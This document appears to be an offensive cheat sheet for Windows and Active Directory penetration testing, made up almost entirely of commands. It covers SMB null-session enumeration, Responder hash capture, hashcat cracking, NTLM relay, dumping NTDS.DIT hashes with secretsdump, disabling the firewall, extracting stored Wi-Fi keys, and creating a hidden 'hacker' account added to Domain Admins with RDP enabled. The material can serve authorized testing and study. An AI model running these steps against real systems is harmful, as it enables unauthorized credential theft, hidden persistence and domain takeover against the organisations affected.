Windows


# Anonymous users can obtain the Windows password policy

msf > use auxiliary/scanner/smb/smb_enumusers 
------------------------------------------------------------------------------------------------------

# CIFS NULL Session Permitted

enum4linux -a <target IP>

nbtscan <target IP>

rpcclient -U "" <target IP>
Enter  's password: <return>
rpcclient $> 
srvinfo
enumdomusers
queryuser <user>
netshareenum
netshareenumall
querydominfo
getdompwinfo

net use \\target IP\ipc$ "" /u:""
------------------------------------------------------------------------------------------------------

# CIFS Share Writeable By Everyone

Places > Network > Browse Network

------------------------------------------------------------------------------------------------------

# Connect anonymously

smbclient -N -L <target IP>

# Connect with credentials

smbclient -W domain -U user -L <target IP>
proxychains smbclient '//10.0.0.10/c$' -U 'domain.local/username%password'
------------------------------------------------------------------------------------------------------

# NetBIOS and SMB

smbmap -H <target IP>                             Check for access to open shares

enum -G <target IP>
enum -P <target IP>

nbtenum -r <target IP>
nbtenum -q <target IP>

nbtscan -r <target range>
nbtscan -f hosts.txt

smbclient //<target IP>/<share>
   dir
   get <filename>
------------------------------------------------------------------------------------------------------

# Active Directory

- Use Responder to poison LLMNR/NBT-NS requests and capture NTLM/NTLNv2 hashes. This happens when you
   try to identify a host and DNS fails.

responder -A -I eth0
responder -I eth0 -wrd

- Crack the hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

- Relay NTLMv2 hashes if SMB Signing is disabled.
cd /opt/CrackMapExec/cme/thirdparty/impacket/examples/
ntlmrelayx.py

- Host discovery and enumeration
netdiscover -i eth0 -r <CIDR>
nmap -Pn -n -T4 --open -p- -sC -sV -iL targets.txt
   Or use Discover which combines nmap, nmap scripts and Metasploit auxiliary modules.
------------------------------------------------------------------------------------------------------

# Domain controller

nbtstat -a <target IP>

The netbios hex code “1C” next to the domain name signifies that the system being polled is a domain 
controller for the domain name listed on the left. If the “1C” would have been next to an Inet service
it would have signified it was an IIS server.

Note the differences between the U and the G. U = UNIQUE and G = GROUP. When you see a hex code next 
to UNIQUE it is usually associated with the computer itself. With GROUP it is associated with the 
workgroup or domain.

- Use the following MSF module to authenticate to the DC via SMB, create a volume shadow copy of the
system drive, and downloads copies of NTDS.DIT and SYSTEM hive. Then use Impacket to perform 
extraction of the hashes.
auxiliary/admin/smb/psexec_ntdsgrab
impacket-secretsdump -system SYSTEM -ntds NTDS.DIT LOCAL

impacket-secretsdump -hashes <hash> -just-dc LAB/dc\$@10.0.0.1
------------------------------------------------------------------------------------------------------

# Enumeration using a low level account

whoami
hostname
echo %username%
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix(s)"

net users                                         Local users
net user <current user>

ipconfig /all
route print
arp -A

netstat -ano | findstr "LISTEN"
netstat -ano | findstr "ESTABLISH"

netsh firewall show state
netsh firewall show config

schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY

date /t & time /t
doskey /history
gpresult /z

net session

set

tasklist /m
tasklist /svc
tasklist /v

dir c:\*.xls /s                                   Show all Excel files
dir c:\*.xlsx /s                                  Show all Excel files
dir c:\*.ppt /s                                   Show all PowerPoint files
dir c:\*.pptx /s                                  Show all PowerPoint files
dir c:\*.doc /s                                   Show all Word docs
dir c:\*.docx /s                                  Show all Word docs
dir c:\*.pdf /s                                   Show all PDF files

dir /s /p *password*                              Show all filenames that include 'password'
------------------------------------------------------------------------------------------------------

# Firewall

netsh firewall show state
netsh firewall show config

netsh firewall add portopening TCP 3389 RDP
netsh firewall set opmode disable                 Disable firewall

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear
------------------------------------------------------------------------------------------------------

# User Accounts

- Local
net users                                         Local users
net user <current user>
net accounts                                      Local password policy
net config workstation
net localgroup                                    Local Security Groups
net localgroup Administrators                     Users in the local Administrators Security Group
net localgroup "Remote Desktop Users"
net share
net user <user> <password> /add                   Add a local user

net user hacker /domain                           Info on domain user
net view                                          Computers in the users domain and other domains
net view /domain                                  Computers in other domain

net user hacker abc123 /add
net localgroup Administrators hacker /add

- Hide a newly created account
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v hacker /d 0 /f

- Domain
net accounts /domain                              Domain password policy
net group “Domain Admins" /domain                 Show domain admin
net group “Domain Users" /domain                  Show domain users
net user /domain                                  Show domain users
net localgroup Administrators /domain             Users in the domain Administrators Security Group
net localgroup /domain                            Domain Security Groups

net user hacker password /add /domain             Add a user to the domain
net group "Domain Admins" hacker /add /domain     Add a user to a specific Security Group on the domain
------------------------------------------------------------------------------------------------------

# Open RDP in the firewall, start the service and login

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode disable
sc config termservice start= auto
rdesktop -u <user> <target IP>
------------------------------------------------------------------------------------------------------

# Privilege Escalation

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
pip install xlrd --upgrade
./windows-exploit-suggester.py --update (note the database file name)

systeminfo.exe > systeminfo.txt               Run this on the Windows target and d/l to attack VM

./windows-exploit-suggester.py --database 2020-01-18-mssb.xls --systeminfo systeminfo.txt
------------------------------------------------------------------------------------------------------

# Show domain users and group information

DumpSec

nltest /dclist:<domain>                           Locate the domain controller
global.exe "domain admins" \\dc                   Show members of domain groups

